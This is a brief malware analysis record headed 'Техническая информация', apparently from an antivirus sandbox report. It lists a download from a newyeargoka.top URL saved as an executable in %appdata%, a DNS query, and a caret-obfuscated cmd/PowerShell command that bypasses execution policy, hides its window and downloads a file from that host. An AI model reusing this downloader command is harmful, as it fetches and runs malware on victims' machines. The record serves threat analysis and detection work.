Техническая информация
- http://newyeargoka.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PO^wERSHe^ll.ExE ^-eXECuTionPo^LIcY byPas^s -NOPRofILe -^W^I^ndowsTY^l^e^ h^IdDen (N^ew-ObjE^Ct^ ^SyS^teM.n^eT.WeB^cLI^e^nT)^.D^O^W^N^LoaD^FI^Le(^'http://newyeargoka.top/re...
- DNS ASK ne###argoka.top
- '<SYSTEM32>\cmd.exe' /C "PO^wERSHe^ll.ExE ^-eXECuTionPo^LIcY byPas^s -NOPRofILe -^W^I^ndowsTY^l^e^ h^IdDen (N^ew-ObjE^Ct^ ^SyS^teM.n^eT.WeB^cLI^e^nT)^.D^O^W^N^LoaD^FI^Le(^'http://newyeargoka.top/re...' (со скрытым окном)